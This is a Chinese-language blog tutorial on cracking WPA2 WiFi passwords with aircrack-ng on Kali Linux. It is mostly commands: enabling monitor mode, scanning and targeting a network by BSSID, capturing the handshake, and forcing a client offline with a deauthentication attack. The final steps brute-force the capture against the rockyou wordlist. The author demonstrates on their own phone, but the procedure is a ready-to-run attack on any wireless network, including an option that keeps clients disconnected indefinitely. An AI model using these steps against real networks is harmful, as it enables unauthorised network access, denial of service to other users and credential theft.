赞
踩
相关阅读:如何破解攻击WiFi
百度安全验证https://baijiahao.baidu.com/s?id=1764248756021219497&wfr=spider&for=pc上面2篇文章写得都很不错
将无线网卡插到电脑上,如果弹出检测到新的USB设备,就将此设备连接到虚拟机。然后点击虚拟机--->可移动设备--->选择自己的网卡--->连接
可能出现的问题:在可移动设备处无法连接无线网卡;解决:在虚拟机设置中将usb控制器设置成如图所示。注意要先关闭虚拟机在设置。
使用ifconfig命令查看是否存在wlan0网卡,如果不现在可能是未挂载成功或者wlan0网卡不是激活状态
- # 显示up状态(激活状态)的网卡信息
- ifconfig
- # 显示所有网卡的信息,包含未up的
- ifconfig -a
- # 激活wlan0
- sudo ifconfig wlan0 10.0.0.100 up
- # 使用su切换root,后面操作基本都需要root权限
- su
- # 使用airmon-ng查看,如果PYH一栏为null,表示不支持监听模式
- airmon-ng
-
- # 如果不支持监听模式请更换无线网卡,或者使用监听驱动
- # 参考 https://www.cnblogs.com/answerThe/p/12488477.html ,https://github.com/aircrack-ng?tab=repositories
- # 检查影响
- airmon-ng check
- # 杀死影响
- airmon-ng check kill
- # 开启无线监听,wlan0网卡就是刚刚上面使用ifconfig看到的网卡,开启监听模式后,无线网卡接口wlan0变动为wlan0mon, 能够输入ifconfig进行查看
- airmon-ng start wlan0
- # 查看周边wifi,注意此时的网卡是wlan0mon,记录需要攻击的目标的BSSID和CH
- airodump-ng wlan0mon
- ### 抓包命令,请注意此抓包的shell窗口不要关闭
- # 注意此处的shell窗口如果关闭过,抓的包的存储名称会有变化,后面解包时要注意,进入wifitest目录查看.cap的包
- # 命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0monbssid就是要抓取包的mac地址,信道频率 是CH,)
-
- mkdir wifitest
- airodump-ng --bssid A4:39:B3:15:B5:9E -c 3 -w ./wifitest/ wlan0mon
-
- # BSSID: 无线 AP 的硬件地址
- # PWR: 信号强度,值是负数,绝对值越小表示信号越强
- # CH: 无线网络信道
- # ENC: 加密方式,我们要破解的是 WPA2
- # ESSID: 无线网络的名称
- # BSSID: 无线 AP 的硬件地址
- # STATION: 用户设备的硬件地址
实战中以信号最强的为例(PWD为信号强度,越小信号越强),这里我强制我的手机下线重连(mac地址为---> A4:4B:D5:AC:41:7C)
- # 新建一个shell窗口进行攻击
- aireplay-ng -0 10 -a A4:39:B3:15:B5:9E -c A4:4B:D5:AC:41:7C wlan0mon
-
- # -0 冲突攻击模式,用于使客户端断开与路由器的连接
- # 10 为攻击的次数,如果一直跑不出来可以把线程设置大一点。设置为0会无限攻击,导致客户端一直无法连接路由器,请谨慎使用
- # -a 路由器mac地址 -c 客户端mac地址
握手包抓取原理:当客户端与路由器建立链接进行通信时,会发送包含hash算法加密的密码数据包,也就是握手包。通过软件捕获此数据包,就完成了抓包。如果在抓包期间没有客户端连接路由器的过程,那就不会有握手包的发送,也就无法抓取握手包了,只能期待有新客户端连接路由器,或者原有客户端掉线后重新连接。除了漫长的等待我们还有一种方法,使用aircrack-ng套件的另一个工具aireplay-ng,它可以强制用户掉线并自动连接路由器,这样就有机会抓到握手包了(如果线程设置大的话,就会导致用户一直连不上网)。在airodump-ng抓包过程中,只要有设备连接到路由器,在station栏中找到它们的mac地址,此时重新打开一个终端,输入命令强制用户掉线重连,直至抓包监听的shell窗口出现WPA handshake即表示抓包成功。
- # 抓包完成后就可以结束监听了,抓的包存储在wifitest目录下,进目录查看是否只有一个.cap的包,如果有多个,可能就是前面抓包时关闭过shell窗口,导致抓取了多个包,需要确定带有密码的包是哪一个,或者都进行爆破
-
- # 在抓包的shell窗口先ctrl+c,再输入下面命令结束监听
- airmon-ng stop wlan0mon
- # 先将Kali自带的字典解压,这是1个一千四百多万的大字典,爆破完估计得几天
- gzip -d /usr/share/wordlists/rockyou.txt.gz
- # 解密 -W 字典路径
- aircrack-ng -w /usr/share/wordlists/rockyou.txt ./wifitest/-01.cap
接下来就是漫长的等待,也有可能解密不成功,这就是字典的问题,字典越大,越容易成功,也可在网上下载其他字典
- # 这里为了演示效果,就使用自己新建的一个字典解密,我的密码是wang12345,kali那个字典里没有。。。
- aircrack-ng ./wifitest/-01.cap -w ./pass.txt
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。